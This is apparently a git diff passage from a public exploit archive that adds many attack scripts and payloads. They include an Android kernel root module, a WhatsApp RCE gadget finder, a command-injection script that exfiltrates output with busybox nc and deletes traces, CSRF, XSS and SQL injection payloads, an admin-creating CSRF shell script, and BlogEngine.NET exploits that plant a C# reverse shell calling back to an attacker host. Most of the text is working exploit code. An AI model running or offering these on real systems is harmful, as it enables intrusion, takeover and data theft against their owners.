'Maddie Stone', # discovery and exploit
'grant-h', # Qu1ckR00t
'timwr', # metasploit module
],
'References' => [
[ 'CVE', '2019-2215' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
[ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
[ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
],
'DisclosureDate' => "Sep 26 2019",
'SessionTypes' => [ 'meterpreter' ],
'Platform' => [ "android", "linux" ],
'Arch' => [ ARCH_AARCH64 ],
'Targets' => [[ 'Auto', {} ]],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
'WfsDelay' => 5,
},
'DefaultTarget' => 0,
}
))
end
def upload_and_chmodx(path, data)
write_file path, data
chmod(path)
register_file_for_cleanup(path)
end
def exploit
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
exploit_data = File.read(local_file, {:mode => 'rb'})
workingdir = session.fs.dir.getwd
exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
upload_and_chmodx(exploit_file, exploit_data)
payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
upload_and_chmodx(payload_file, generate_payload_exe)
print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
print_status("Exploit result:\n#{result}")
end
end

109
exploits/android/remote/47515.cpp Normal file
View file

@ -0,0 +1,109 @@
# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/
#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>
typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;
//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}
//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}
//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}
//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}

208
exploits/android/webapps/47722.py Executable file
View file

@ -0,0 +1,208 @@
# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2016-12-23
# Exploit Author: Alexandre Teyar
# Vendor Homepage: https://www2.mersive.com/
# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
# Versions: 2.8.0
# Tested On: Mersive Solstice 2.8.0
# CVE: CVE-2017-12945
# Description : This will exploit an (authenticated) blind OS command injection
# vulnerability present in Solstice devices running versions
# of the firmware prior to 2.8.4.
# Notes : To get the the command output (in piped-mode), a netcat listener
# (e.g. 'nc -lkvp <LPORT>') needs to be launched before
# running the exploit.
# To get an interactive root shell use the following syntax
# 'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
# -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
# -e /system/bin/sh -i"'.
#!/usr/bin/env python3
import argparse
import logging
import requests
import sys
import time
def parse_args():
""" Parse and validate the command line supplied by users
"""
parser = argparse.ArgumentParser(
description="Solstice Pod Blind Command Injection"
)
parser.add_argument(
"-d",
"--debug",
dest="loglevel",
help="enable verbose debug mode",
required=False,
action="store_const",
const=logging.DEBUG,
default=logging.INFO
)
parser.add_argument(
"-lh",
"--lhost",
dest="lhost",
help="the listening address",
required=False,
type=str
)
parser.add_argument(
"-lp",
"--lport",
dest="lport",
help="the listening port - default 4444",
required=False,
default="4444",
type=str
)
parser.add_argument(
"-p",
"--payload",
dest="payload",
help="the command to execute",
required=True,
type=str
)
parser.add_argument(
"-pass",
"--password",
dest="password",
help="the target administrator password",
required=False,
default="",
type=str
)
parser.add_argument(
"-rh",
"--rhost",
dest="rhost",
help="the target address",
required=True,
type=str
)
return parser.parse_args()
def main():
try:
args = parse_args()
lhost = args.lhost
lport = args.lport
password = args.password
rhost = args.rhost
logging.basicConfig(
datefmt="%H:%M:%S",
format="%(asctime)s: %(levelname)-8s %(message)s",
handlers=[logging.StreamHandler()],
level=args.loglevel
)
# Redirect stdout and stderr to <FILE>
# only when the exploit is launched in piped mode
if lhost and lport:
payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
logging.info(
"attacker listening address: {}:{}".format(lhost, lport)
)
else:
payload = args.payload
logging.info("solstice pod address: {}".format(rhost))
if password:
logging.info(
"solstice pod administrator password: {}".format(password)
)
# Send the payload to be executed
logging.info("sending the payload...")
send_payload(rhost, password, payload)
# Send the results of the payload execution to the attacker
# using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
if lhost and lport:
payload = (
"busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
lhost, lport
)
)
logging.info("retrieving the results...")
send_payload(rhost, password, payload)
# Erase exploitation traces
payload = "rm -f /data/local/tmp/rce.tmp"
logging.info("erasing exploitation traces...")
send_payload(rhost, password, payload)
except KeyboardInterrupt:
logging.warning("'CTRL+C' pressed, exiting...")
sys.exit(0)
def send_payload(rhost, password, payload):
URL = "http://{}/Config/service/saveData".format(rhost)
headers = {
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"Referer": "http://{}/Config/config.html".format(rhost)
}
data = {
"m_networkCuration":
{
"ethernet":
{
"dhcp": False,
"staticIP": "; {}".format(payload),
"gateway": "",
"prefixLength": 24,
"dns1": "",
"dns2": ""
}
},
"password": "{}".format(password)
}
# Debugging using the BurpSuite
# proxies = {
# 'http': 'http://127.0.0.1:8080',
# 'https': 'https://127.0.0.1:8080'
# }
try:
logging.info("{}".format(payload))
response = requests.post(
URL,
headers=headers,
# proxies=proxies,
json=data
)
logging.debug(
"{}".format(response.json())
)
# Wait for the command to be executed
time.sleep(2)
except requests.exceptions.RequestException as ex:
logging.error("{}".format(ex))
sys.exit(0)
if __name__ == "__main__":
main()

183
exploits/ashx/webapps/46765.txt Normal file
View file

@ -0,0 +1,183 @@
# Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery (All Actions/Methods)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
<form id='del' method='POST' action='https://[target_URL]:1239/CommonDataHandlerReadOnly.ashx'>
<input name='f' id='dd'>
</form>
<script>
document.getElementById("dd").value= JSON.stringify({
id: '1',
method: 'deleteDashboard',
params:{ 'id' : 21}
});
document.getElementById("del").submit();
</script>
##########################################
#all methods is vulnerable
##########################################
#addDashboard(p)
#addDashboardUser(par)
#addDashboardUserList(par)
#applySchedulingForDashboard(dashboardId, taskId, config)
#applySchedulingForFolder(folderId, taskId, config)
#applySchedulingForReport(reportId, taskId, vmr, config)
#canModifyDashboard(id)
#captureContainer(data, taskId)
#changeObjectVisibility(objectId, visible)
#checkForUpdateReportPack(confirm)
#checkIfAdmin()
#checkUserPermissionsResolved(o)
#checkWinVersion()
#clearContainer()
#connectToSqlServer(data, save)
#DBExecuteProcedure(db)
#DBStoreLoad(db)
#DBStoreSave(db)
#deleteDashboard(id)
#deleteDashboardImage(imageId)
#deleteDashboardWidget(p)
#DeleteFolder(param)
#deleteReportPack(name, id, type)
#deleteTask(id)
#doLogin(domain, login, password)
#editDashboard(p)
#emptyDashboardRecycleBin(o)
#findDashboardUsers(p)
#getAboutData()
#getActionParameters()
#getAdvancedData()
#getAlarms()
#getAllSchedulingsForDashboard(info)
#getAllSchedulingsForFolder(info)
#getAllSchedulingsForReport(info)
#getBackUpTree(wsj)
#getBusinessViewTree(wsj)
#getComboData()
#getCommonGridItem()
#getConfiguration()
#getConfigurationOverview(id)
#getConnectedServersGridItem()
#getDashboardData(dashboard_id)
#getDashboardImages(p)
#getDashboardPermissions(p)
#getDashboardPredefiniedReports(p)
#getDashboards(p)
#getDashboardSSRSChartTypes(p)
#getDashboardUserList(p)
#getDashboardWidgetTypeData(p)
#getDefaultUserName()
#getDeletedDashboards(p)
#getEnumeratingTaskContainers(id)
#getEnumeratingTaskProperties(id)
#getEnumeratingTaskScheduling(id)
#getExtensionModules(p)
#getIgnoredDatastores(p)
#getIgnoredDatastoresDetails(p)
#getInfrastructureTree(wsj)
#getIsReporterFreeVersion()
#getJobData(id)
#getLicenseData()
#getLicensedHVSockets(p)
#getLicensedVMSockets(p)
#getMetadata(query, reload)
#getNeedToDisableTabs()
#getNotificationData()
#getObjectsToHide(p)
#getOptionList()
#getReportFilters(param)
#getReportImageName()
#getReportListTreeCheckbox(wsj)
#getReportListTreeDashboard(wsj)
#getReportListTreeWorkspace(wsj)
#getReportManagementTree(wsj)
#getReportsSectionsTree(wsj)
#getReportStatistics(param)
#getScheduleDashboardConfig(dashboardId, taskId)
#getScheduleFolderConfig(folderId, taskId)
#getScheduleReportConfig(reportId, taskId, packType)
#getScriptArgumentList()
#getServerScopeAll(wsj)
#getSessionDetails(idwithtype)
#getSessions(p)
#getSessionsTaskTypes(p)
#getSiteStatusGridItem()
#getSmtpServerData()
#getSqlServerData()
#getSsrsServerData()
#getSSRSStatus()
#getStartStopDeleteButtonsEnabled(id)
#getStatistics()
#getTaskList(p)
#getUpdateSessionInfo(o)
#getvCloudList(p)
#getVideoReportData(interval, intervalPeriod, scope)
#getVmStatus()
#getWidgetCustomChartConstructorData(p)
#getWidgetData(r)
#getWidgetList(item)
#getWidgetPackList(j)
#getWidgetParams(uid)
#getWorkspace()
#getWorkspaceReportGridItems(param)
#isSmtpConfigured()
#publishDashboard(id, publish)
#recalculateProjects(ids)
#removeDashboardUser(par)
#resetReportImageName()
#resetSchedulingForDashboard(dashboardId, taskId)
#resetSchedulingForDashboardArray(dashboardId, taskId)
#resetSchedulingForFolder(folderId)
#resetSchedulingForReport(reportId, vmr)
#resetSchedulingTaskForFolder(folderId, taskId)
#resetSchedulingTaskForReport(reportId, taskId, vmr)
#resetSchedulingTasksForFolderArray(folderId, taskId)
#resetSchedulingTasksForReportArray(reportId, taskId, vmr)
#restoreDashboard(p)
#revokeHost(hostName)
#revokeHostHV(hostName)
#SaveFolder(param)
#saveIgnoredDatastores(taskContainerId, dataStores)
#saveSchedulingInfo(taskId, taskProp)
#saveTask(taskProp, taskContainers, excludes)
#sendNotificationAboutDashboardSharing(to, subject, dashboardName, dashboardUrl, permissionLevel)
#sendTestMessage(data, setting)
#setAdvancedData(measure)
#setComboData(data)
#setDashboardUserPermissions(par)
#setDashboardWidget(p)
#SetDragAndDropPosition(dwid, colIndex, position, height)
#setSchedulingEnability(dashboardId, taskId, disabled)
#setSchedulingEnabilityArray(dashboardId, taskId, disabled)
#setSchedulingEnabilityForFolder(folderId, taskId, disabled)
#setSchedulingEnabilityForFolderArray(folderId, taskId, disabled)
#setSchedulingEnabilityForReport(reportId, taskId, disabled)
#setSchedulingEnabilityForReportArray(reportId, taskId, disabled)
#setSmtpServerData(data)
#setSsrsServerData(data)
#startTask(id)
#stopTask(id)
#system.about()
# Returns a summary about the server implementation for display purposes.
#system.listMethods()
# Returns an array of method names implemented by this service.
#system.version()
# Returns the version server implementation using the major, minor, build and revision format.
#testServer(tcd)
#testSsrsConnection(data)
#updateDashboardPosition(p)
#updateTreeExpandedStates(wsj, a)
#validateTaskName(tcd, id)
##########################################

18
exploits/ashx/webapps/46766.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
Path: /CommonDataHandlerReadOnly.ashx
method: addDashboard / editDashboard
SET Description(config) field to “AAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”

18
exploits/ashx/webapps/46767.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
Path: /CommonDataHandlerReadOnly.ashx
method: setDashboardWidget
SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”

28
exploits/asp/webapps/46799.txt Normal file
View file

@ -0,0 +1,28 @@
[+] Sql Injection on microASP (Portal+) CMS
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.microasp.it/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)
[+] Exploit :
http://host/patch/pagina.phtml?explode_tree= [SQL Injection]
[+] PoC :
https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF

19
exploits/asp/webapps/47284.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows
# Vulnerable parameter: PF (member_profile.asp)
# GET Request
GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1

27
exploits/asp/webapps/47666.txt Normal file
View file

@ -0,0 +1,27 @@
# Title: Crystal Live HTTP Server 6.01 - Directory Traversal
# Date of found: 2019-11-17
# Author: Numan Türle
# Vendor Homepage: https://www.genivia.com/
# Version : Crystal Quality 6.01.x.x
# Software Link : https://www.crystalrs.com/crystal-quality-introduction/
POC
---------
GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

22
exploits/asp/webapps/47789.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368
Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
PoC:
Payload: ?!'><sVg/OnLoAD=alert`1`//
Vulnerable URL:
http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//
Solution:
Update to the latest version released by vendor.

27
exploits/asp/webapps/47960.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery
# Google Dork: intext:"TopManage ® 2002 - 2020"
# Date: 2020-01-13
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: http://www.topmanage.com/
# Software Link: http://www.topmanage.com/microsites/olk-web-store/
# Version: 2020
# Tested on: N/A
# CVE : N/A
# Reference: https://websec.nl/news.php
POST /olk/client/login.asp HTTP/1.1
Host: examplesite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://examplesite.com
Connection: close
Referer: https://examplesite.com/olk/client/login.asp?se=Y
Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH
Upgrade-Insecure-Requests: 1
dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=

28
exploits/asp/webapps/48217.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-03-05
# Exploit Author: Miguel Mendez Z.
# Vendor Homepage: www.sumavision.com
# Software Link: http://www.sumavision.com/ensite/i.php?id=29
# Version: EMR 3.0.4.27
# CVE : CVE-2020-10181
-----------------------Exploit Bash---------------------------
echo ""
read -p "Set Hostname: " host
read -p "Set username: " user
echo "(The password should be between 6 and 32 in length)"
read -p "Set password: " pass
echo
echo "[+] creating user..."
sleep 2
postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0")
if echo "$postdata" | grep -q "0</html>"; then
echo "[+] http://$host/frame_en.asp"
echo "[+] created access($user - $pass)"
else
echo "[-] user not created"
fi
------------------------------------------------------
Reference:
https://github.com/s1kr10s/Sumavision_EMR3.0/blob/master/exploit_sumavision.sh

14
exploits/aspx/webapps/46987.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: Sitecore v 8.x Deserialization RCE
# Date: Reported to vendor October 2018, fix released April 2019.
# Exploit Author: Jarad Kopf
# Vendor Homepage: https://www.sitecore.com/
# Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx
# Version: Sitecore 8.0 Revision 150802
# Tested on: Windows
# CVE : CVE-2019-11080
Exploit:
Authentication is needed for this exploit. An attacker needs to login to Sitecore 8.0 revision 150802's Admin section.
When choosing to Serializeusers or domains in the admin UI, calls to /sitecore/shell/~/xaml/Sitecore.Shell.Applications.Dialogs.Progress.aspx will include a CSRFTOKEN parameter.
By replacing this parameter with a URL-encoded, base64-encoded crafted payload from ysoserial.net, an RCE is successful.

227
exploits/aspx/webapps/47010.py Executable file
View file

@ -0,0 +1,227 @@
# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
# Date: 17 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10719
#1. Description
#==============
#BlogEngine.NET is vulnerable to an Directory Traversal on `/api/upload` which allows a RCE through the `theme` parameter.
#2. Proof of Concept
#=============
#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`; exploit the directory traversal to upload the shell into the **/Custom/Themes** #directory:
#~~~
#POST /api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test HTTP/1.1
#Host: $RHOST
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/plain
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: XXX
#Connection: close
#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
#Content-Length: 2085
#-----------------------------12143974373743678091868871063
#Content-Disposition: form-data; filename="PostView.ascx"
#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
#<%@ Import Namespace="BlogEngine.Core" %>
#<script runat="server">
#static System.IO.StreamWriter streamWriter;
# protected override void OnLoad(EventArgs e) {
# base.OnLoad(e);
#using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
#using(System.IO.Stream stream = client.GetStream()) {
#using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
#streamWriter = new System.IO.StreamWriter(stream);
#StringBuilder strInput = new StringBuilder();
#System.Diagnostics.Process p = new System.Diagnostics.Process();
#p.StartInfo.FileName = "cmd.exe";
#p.StartInfo.CreateNoWindow = true;
#p.StartInfo.UseShellExecute = false;
#p.StartInfo.RedirectStandardOutput = true;
#p.StartInfo.RedirectStandardInput = true;
#p.StartInfo.RedirectStandardError = true;
#p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
#p.Start();
#p.BeginOutputReadLine();
#while(true) {
#strInput.Append(rdr.ReadLine());
#p.StandardInput.WriteLine(strInput);
#strInput.Remove(0, strInput.Length);
# } } } } }
# private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
# StringBuilder strOutput = new StringBuilder();
# if (!String.IsNullOrEmpty(outLine.Data)) {
# try {
# strOutput.Append(outLine.Data);
# streamWriter.WriteLine(strOutput);
# streamWriter.Flush();
#} catch (Exception err) { }
# }
# }
#</script>
#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
#-----------------------------12143974373743678091868871063--
#~~~
#The RCE can be triggered by setting the **theme** parameter to **RCE_TEST**: $RHOST/?theme=RCE_Test
#==============================
import argparse
import io
import json
import os
import re
import requests
import sys
"""
Exploit for CVE-2019-10719
CVE Identified by: Aaron Bishop
Exploit written by: Aaron Bishop
Upload and trigger a reverse shell
python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337
Open a listener to capture the reverse shell - Metasploit or netcat
nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
"""
urls = {
"login": "/Account/login.aspx",
"traversal": "/api/filemanager"
}
def make_request(session, method, target, params={}, data={}, files={}):
proxies = {
"http": "127.0.0.1:8080",
"https": "127.0.0.1:8080"
}
if method == 'GET':
r = requests.Request(method, target, params=params)
elif method == 'POST':
if files:
r = requests.Request(method, target, files=files)
else:
r = requests.Request(method, target, data=data)
prep = session.prepare_request(r)
resp = session.send(prep, verify=False, proxies=proxies)
return resp.text
def login(session, host, user, passwd):
resp = make_request(session, 'GET', host+urls.get('login'))
login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
login_data = dict([(i[0],i[2]) for i in login_form])
login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
resp = make_request(session, 'POST', host+urls.get('login'), data=login_data)
def upload_shell(session, target, shell_dir, listener):
try:
lhost, lport = listener.split(':')
except:
print(target, " is not in the correct HOST:PORT format")
sys.exit(1)
shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
'''
make_request(session, "POST", target + "/api/upload?action=filemgr&dirPath=~/App_Data/files/../../Custom/Themes/" + shell_dir, files={"file": ("PostView.ascx".format(shell_dir=shell_dir), shell, "application/octet-stream")})
def trigger_shell(session, target, shell_dir):
make_request(session, "GET", target + "/", params={"theme": shell_dir})
def main(target, user, passwd, shell_dir, listener):
with requests.Session() as session:
login(session, target, user, passwd)
upload_shell(session, target, shell_dir, listener)
trigger_shell(session, target, shell_dir)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2019-10719 Path traversal + RCE')
parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
parser.add_argument('-d', '--dir', nargs='?', default="RCE", help='Theme Directory to write Reverse shell too')
parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
args = parser.parse_args()
protocol = "https://" if args.ssl else "http://"
main(protocol + args.target, args.user, args.passwd, args.dir, args.listener)

227
exploits/aspx/webapps/47011.py Executable file
View file

@ -0,0 +1,227 @@
# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
# Date: 17 Jun 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://blogengine.io/
# Version: v3.3.7
# Tested on: 3.3.7, 3.3.6
# CVE : 2019-10720
#1. Description
#==============
#BlogEngine.NET is vulnerable to a Directory Traversal through the **theme** cookie which triggers a RCE.
#2. Proof of Concept
#=============
#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`:
#~~~
#POST /api/upload?action=filemgr HTTP/1.1
#Host: $RHOST
#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
#Accept: text/plain
#Accept-Language: en-US,en;q=0.5
#Accept-Encoding: gzip, deflate
#Cookie: XXX
#Connection: close
#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
#Content-Length: 2085
#-----------------------------12143974373743678091868871063
